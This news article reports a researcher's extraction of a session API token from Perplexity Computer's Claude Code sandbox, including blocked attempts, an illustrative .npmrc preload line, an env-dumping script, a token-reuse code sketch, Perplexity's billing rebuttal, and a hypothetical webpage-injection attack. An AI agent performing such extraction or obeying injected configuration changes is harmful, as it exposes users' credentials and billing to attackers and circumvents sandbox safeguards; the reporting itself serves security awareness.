Perplexity Computer “Exploit”: Did Someone Really Get Free Access to Claude Opus 4.6?


A claim that someone managed to access Claude Opus for free through Perplexity Computer recently spread quickly across AI and cybersecurity communities. The story sounded dramatic: a researcher allegedly extracted a token from the system and used it to run Anthropic's most powerful model without paying a cent.

But as more details surfaced, the situation turned out to be far more nuanced. The technical discovery is real, yet the conclusion about "unlimited free access" appears to be misleading.

How the story started

On March 12, 2026, entrepreneur and startup founder Yousif Astarabadi shared a thread explaining how he investigated the internal behavior of Perplexity Computer, a recently released product that allows AI agents to run code inside a controlled environment known as a sandbox.

The system relies on AI models like Claude to execute commands and interact with software tools in that isolated environment.

While examining how the system worked internally, Astarabadi noticed something intriguing: the runtime environment must contain a credential allowing Claude Code to communicate with Anthropic's API.

If that credential could be retrieved, it could theoretically be reused outside the sandbox.

Six failed attempts before success

According to the researcher's own description, extracting the token was not straightforward. Several attempts failed before a working method was discovered.

Initial strategies involved trying to trick the agent into exposing environment variables or running scripts that would reveal internal configuration details. Each time, the systemโ€™s protections detected the attempt and blocked the request.

The breakthrough came from an entirely different angle: the applicationโ€™s startup process.

Claude Code is launched through npm, the widely used JavaScript package manager. Whenever npm runs, it reads configuration from a file called .npmrc in the user's home directory, among other locations.

That configuration file can contain instructions that alter how the application starts.

The configuration trick that exposed the token

The key discovery involved a specific npm option that allows a JavaScript module to be loaded before the main application executes.

By adding a custom line to the .npmrc file, the researcher was able to ensure that a small script ran immediately when Claude Code started, before many of the security checks took place.
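The modification described above can be sketched as a single line in the user's .npmrc. The exact option the researcher used was not published; npm's documented node-options setting, which passes extra flags such as --require to the Node.js process, is one plausible vehicle, so a hypothetical version might look like this (the script path is an arbitrary placeholder):

```ini
; Hypothetical .npmrc line illustrating the class of trick described above.
; node-options is npm's setting for extra Node.js flags; --require loads a
; module before the main application's own code runs.
node-options=--require /tmp/dump-env.js
```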

The script itself was simple. It read the environment variables of the running process and copied their contents into a file accessible within the shared workspace.

From there, the token used by Claude to access Anthropic's API could be retrieved.

The entire process reportedly required only a few commands.

Testing the token outside the sandbox

After extracting the token, the researcher configured it on his own computer and began sending requests to the Claude Opus model.
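Reusing the credential from another machine amounts to treating it as an ordinary Anthropic API key. In the sketch below, the endpoint and header names come from Anthropic's public Messages API documentation; the model identifier, the token value, and the environment variable name are placeholders, and nothing here reflects the researcher's actual setup:

```javascript
// Sketch of reusing an extracted credential as a plain Anthropic API key.
// The URL and headers follow Anthropic's documented Messages API; the
// model id and token are placeholders.
function buildClaudeRequest(token) {
  return {
    url: 'https://api.anthropic.com/v1/messages',
    method: 'POST',
    headers: {
      'x-api-key': token,                 // credential extracted from the sandbox
      'anthropic-version': '2023-06-01',  // required API version header
      'content-type': 'application/json',
    },
    body: JSON.stringify({
      model: 'claude-opus-4-6',           // placeholder model identifier
      max_tokens: 1024,
      messages: [{ role: 'user', content: 'Hello from outside the sandbox' }],
    }),
  };
}

// Sending the request is then a single HTTP call, e.g.
//   fetch(req.url, { method: req.method, headers: req.headers, body: req.body });
const req = buildClaudeRequest(process.env.EXTRACTED_TOKEN || 'token-placeholder');
```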

To verify the effect on billing, he deliberately generated a large number of tokens. Surprisingly, his Perplexity account balance appeared unchanged.

This led to the claim that the costs were being charged to Perplexity's master account instead of the user.

The implication was dramatic: anyone who could extract the token could theoretically run Claude Opus indefinitely without paying.

Perplexity's response changes the picture

Shortly after the claim spread, Perplexity addressed the situation publicly.

According to the company, the extracted credential was not a shared API key. Instead, it was a temporary proxy token generated specifically for an individual user session.

That means the token still belongs to the user, and any usage tied to it ultimately gets billed to that user's account.

The reason the balance did not immediately decrease is reportedly due to asynchronous billing. In other words, charges are processed after the usage occurs rather than instantly.

Perplexity reportedly provided a list of nearly two hundred billing events associated with the tests, confirming that the activity had in fact been recorded.

A real vulnerability, but not free AI

While the sensational claim of unlimited free access appears incorrect, the technical aspect of the discovery remains noteworthy.

The token was successfully extracted from the sandbox environment and reused from an external machine.

That raises an important security question: if a token can function outside the sandbox, could malicious code attempt to capture it automatically?

The researcher suggested a possible scenario where a compromised webpage visited by an AI agent might inject the same configuration modification into the environment. If successful, that could allow an attacker to extract the user's token and generate usage billed to the victim.

An unanswered security concern

For now, Perplexity has clarified the billing mechanism but has not publicly addressed the broader concern about token exposure beyond the sandbox.

The debate highlights a growing challenge as AI agents gain the ability to run code and interact with external systems. When those agents operate inside complex environments, security boundaries become increasingly important.

Even small configuration details, like the way an application starts, can open unexpected attack paths.

In this case, the story serves as a reminder that in the rapidly evolving AI ecosystem, the line between clever experimentation and genuine vulnerability can sometimes be very thin.

Alex Morgan
I write about artificial intelligence as it shows up in real life, not in demos or press releases. I focus on how AI changes work, habits, and decision-making once it's actually used inside tools, teams, and everyday workflows. Most of my reporting looks at second-order effects: what people stop doing, what gets automated quietly, and how responsibility shifts when software starts making decisions for us.